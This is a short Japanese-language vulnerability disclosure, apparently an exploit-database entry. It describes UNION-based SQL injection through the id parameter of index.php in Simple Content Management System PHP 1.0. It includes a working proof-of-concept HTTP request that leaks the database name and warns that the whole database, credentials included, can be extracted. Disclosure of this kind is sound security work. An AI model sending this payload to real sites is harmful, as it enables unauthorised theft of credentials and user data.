
Simple Content Management System PHPにおけるSQLインジェクションの概念実証エクスプロイトで、index.phpのidパラメータを介したUNIONベースのデータ抽出を実証します。
Simple Content Management System PHP には SQL インジェクションの脆弱性が存在します。index.php の id パラメータは SQL クエリに渡される前にサニタイズされておらず、認証されていない攻撃者がデータベース名、テーブル、認証情報などの機密データをデータベースから抽出できる可能性があります。
/web/index.phpidcode-projects.org
Simple Content Management System PHP
1.0
GET /web/index.php?id=1 UNION SELECT 1,database(),3-- - HTTP/1.1
Host: [target]

データベース名がページに反映され、SQL インジェクションが確認されます。

認証されていないリモート攻撃者は、id パラメータを介した UNION ベースの SQL インジェクションを使用して、認証情報、ユーザーデータ、保存されているすべてのコンテンツを含むデータベース全体を抽出できます。
Imad Alvi